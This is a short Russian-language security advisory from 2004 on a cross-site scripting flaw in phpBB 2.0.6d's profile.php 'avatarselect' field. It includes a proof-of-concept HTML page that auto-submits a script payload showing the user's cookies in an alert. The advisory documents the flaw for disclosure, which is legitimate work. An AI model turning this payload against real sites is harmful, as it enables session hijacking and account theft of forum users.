Security Lab

Межсайтовый скриптинг в 'avatarselect' в phpBB 'profile.php'

Дата публикации:25.03.2004
Всего просмотров:3130
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB 2.06d

Описание: Уязвимость обнаружена в phpBB в 'profile.php'. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

-------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
  <input name="avatarselect" value='" ><script>alert(document.cook
ie)</script>'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  <script>
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  </script>
  ---------------end-------------------

URL производителя: http://www.phpbb.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: phpBB profile.php Cross Site Scripting Vulnerability